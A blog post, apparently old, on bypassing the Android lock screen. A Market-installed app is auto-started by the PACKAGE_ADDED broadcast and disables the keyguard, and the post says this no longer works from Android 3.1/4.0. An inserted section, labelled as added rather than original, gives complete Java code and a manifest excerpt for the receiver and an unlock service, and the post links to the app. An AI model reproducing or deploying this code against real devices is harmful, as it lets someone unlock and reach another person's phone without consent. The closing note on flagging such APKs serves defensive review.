Android Lock Screen Bypass

Note: This post is very old. Google made a change in Android 3.1 (which reached phones with 4.0) for security reasons: a newly installed application is held in a "stopped" state and will not be started by a broadcast intent until the user has launched it manually at least once. Therefore this technique doesn't work on devices running 3.1/4.0 or later.

So far I have tried out 5 Android devices here in the UK (test device, personal phone, and those of friends). They all lack the same feature - if you forget your PIN or pattern code, there doesn't seem to be a way to reset it. You are effectively locked out of your device. Searching online I see that some people are able to reset it after a certain number of attempts by entering their GMail credentials, but I am unable to do so on mine or others I have tried.

We now have the fantastic web based Android Market, and I wrote about a few minor security findings here. One of the common responses I saw to articles talking about the threat of malware distribution was that when remotely installed, an application doesn't automatically run and the user would have to manually launch the malware. This is not actually correct, and to demonstrate I decided to create a legitimate utility which can be deployed to a locked phone, executed remotely, and set to disable the lock screen. This will yield access to a locked device so that the user may go in and backup their data.

How it works

Quite simple really. Android sends out a number of broadcast messages which an application can receive, such as SMS received or WiFi disconnected. An application has to register a receiver for the broadcasts it wants, and this can be done at run time (registerReceiver()) or, for most system broadcasts, at install time by declaring the receiver in AndroidManifest.xml. When a relevant message comes in for a manifest-registered receiver, the system delivers it to the application and, if the application's process is not running, starts it automatically. That is the whole trick: no user interaction is needed for the code to run.

After testing out various broadcast messages the best one I found for the purpose of this utility was android.intent.action.PACKAGE_ADDED. This exists in all APIs since version 1 and is triggered when an application is installed. An application does not receive this broadcast for its own installation, so to get the application to execute remotely we first deploy it from the Android Market, then deploy any other application; the second install fires PACKAGE_ADDED and causes the first one to launch.

Once launched it is just a matter of obtaining a KeyguardLock from KeyguardManager (newKeyguardLock()) and calling its disableKeyguard() method, which needs the android.permission.DISABLE_KEYGUARD permission declared in the manifest. This is a legitimate API to enable applications to hide the screen lock when, say, an incoming phone call is detected. After finishing the call the app ought to call reenableKeyguard(), but we just keep it disabled.
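The two steps above, the manifest-registered PACKAGE_ADDED receiver and the keyguard disable, as an added example in Java. This is not the code of the original Screen Lock Bypass app; the package name com.example.unlock, the class names and the lock tag are my own assumptions, and it targets the pre-3.1 API this post was written against. The manifest excerpt is shown in a comment because the install-time registration is what lets the system start a never-launched app.

```java
// File: PackageAddedReceiver.java  (added example, not the original app's code)
package com.example.unlock;

/*
 * AndroidManifest.xml excerpt (assumed layout). The receiver is registered at
 * install time so the system starts this app's process to deliver the
 * broadcast. PACKAGE_ADDED carries a "package:" data URI, so the filter must
 * declare that scheme or the receiver never matches.
 *
 *   <uses-permission android:name="android.permission.DISABLE_KEYGUARD" />
 *   <application ...>
 *     <receiver android:name=".PackageAddedReceiver">
 *       <intent-filter>
 *         <action android:name="android.intent.action.PACKAGE_ADDED" />
 *         <data android:scheme="package" />
 *       </intent-filter>
 *     </receiver>
 *     <service android:name=".UnlockService" />
 *   </application>
 */

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;

public class PackageAddedReceiver extends BroadcastReceiver {
    private static final String TAG = "UnlockReceiver";

    @Override
    public void onReceive(Context context, Intent intent) {
        // An app never receives PACKAGE_ADDED for its own install, so this only
        // fires when some *other* package is installed afterwards.
        String installed = intent.getData() == null
                ? "?" : intent.getData().getSchemeSpecificPart();
        Log.i(TAG, "PACKAGE_ADDED for " + installed + ", starting unlock service");

        // A receiver's process may be killed as soon as onReceive() returns, and
        // the keyguard is re-enabled when the Binder token behind a KeyguardLock
        // dies with its process, so the lock is held in a long-lived Service.
        context.startService(new Intent(context, UnlockService.class));
    }
}
```

```java
// File: UnlockService.java  (added example, not the original app's code)
package com.example.unlock;

import android.app.KeyguardManager;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.os.IBinder;

public class UnlockService extends Service {
    private KeyguardManager.KeyguardLock lock;  // kept alive for the service's lifetime

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        if (lock == null) {
            KeyguardManager km =
                    (KeyguardManager) getSystemService(Context.KEYGUARD_SERVICE);
            // Tag is arbitrary; it only appears in system logs.
            lock = km.newKeyguardLock("ScreenLockBypass");
            // Hides the PIN/pattern screen. A well-behaved app would call
            // lock.reenableKeyguard() when done; this utility deliberately never does.
            lock.disableKeyguard();
        }
        // Ask the system to restart the service if it is killed, so the lock
        // is re-acquired rather than silently lost.
        return START_STICKY;
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null;  // not a bound service
    }
}
```

The same structure is the defensive checklist: a manifest-declared receiver for a broad system broadcast, plus DISABLE_KEYGUARD in the permission list, is exactly the combination a reviewer should flag when vetting an APK, since it lets code run and alter the lock state without the user ever opening the app.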

Get the Screen Lock Bypass application: Google Play